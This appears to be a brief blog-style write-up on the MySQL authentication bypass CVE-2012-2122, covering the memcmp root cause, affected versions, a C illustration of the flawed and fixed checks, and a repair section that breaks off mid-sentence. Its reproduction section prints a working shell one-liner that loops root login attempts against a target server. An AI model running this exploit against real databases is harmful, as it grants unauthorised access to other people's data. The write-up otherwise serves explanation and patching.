
MySQL authentication bypass vulnerability (CVE-2012-2122)

2022-07-06 22:39:00 OOOOOK. two thousand and twenty-one

Vulnerability profile

When connecting to MariaDB/MySQL, the password entered is compared with the expected correct password. Due to improper handling, MySQL can consider the two passwords the same even when memcmp() returns a nonzero value. In other words, anyone who knows a user name can log in to the SQL database directly by trying again and again.

Affected version

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not affected.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected.

Root cause

This vulnerability arises because the code expects memcmp() to return only values in the range -128 to 127. On some platforms memcmp() is optimized and this does not hold, so MySQL can consider two passwords the same even when memcmp() returns a nonzero value. About one attempt in 256 succeeds.
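The narrowing problem described above, modelled in C as an added example (not MySQL source code and not from the original post). The type and function names are hypothetical, and memcmp() results are passed in as plain integers because the real return values depend on the platform's libc.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef char bool8_t; /* hypothetical 8-bit boolean return type */

/* Flawed pattern: the int result of memcmp() is narrowed to 8 bits.
 * On mainstream compilers only the low byte survives, so any nonzero
 * result that is a multiple of 256 becomes 0, which reads as "match". */
bool8_t flawed_mismatch(int cmp) { return (bool8_t)cmp; }

/* Hardened pattern: reduce to 0/1 first, then narrow. */
bool8_t fixed_mismatch(int cmp) { return (bool8_t)(cmp != 0); }

/* Count nonzero memcmp() results in [lo, hi] that a check reads as "match". */
long false_accepts(bool8_t (*mismatch)(int), int lo, int hi)
{
    long n = 0;
    for (int v = lo; v <= hi; v++)
        if (v != 0 && mismatch(v) == 0)
            n++;
    return n;
}

/* Token comparison built on the hardened pattern; returns 1 on mismatch. */
bool8_t token_mismatch(const unsigned char *got, const unsigned char *want, size_t n)
{
    return fixed_mismatch(memcmp(got, want, n));
}

int main(void)
{
    /* Results confined to -128..127 are never misread. */
    printf("flawed, -128..127:     %ld\n", false_accepts(flawed_mismatch, -128, 127));
    /* Wider results (constructed 16-bit range) are misread at multiples of 256. */
    printf("flawed, -32768..32767: %ld\n", false_accepts(flawed_mismatch, -32768, 32767));
    printf("fixed,  -32768..32767: %ld\n", false_accepts(fixed_mismatch, -32768, 32767));
    return 0;
}
```

Over the constructed 16-bit range, 255 of the 65535 nonzero results are misread by the flawed check, in line with the roughly 1-in-256 rate stated above; the hardened check misreads none.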

Vulnerability reproduction

Scan open ports

Attack with MSF

EXP

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

Repair

Upgrade MySQL (versions lower than the following must be upgraded to the latest version: 5.0 releases below 5.0.96; 5.1 releases below 5.1.63; 5.5 releases below 5.5.25). Stop mysql, then back up the entire mysql installation directory and data directory (this step is only to prevent escalation
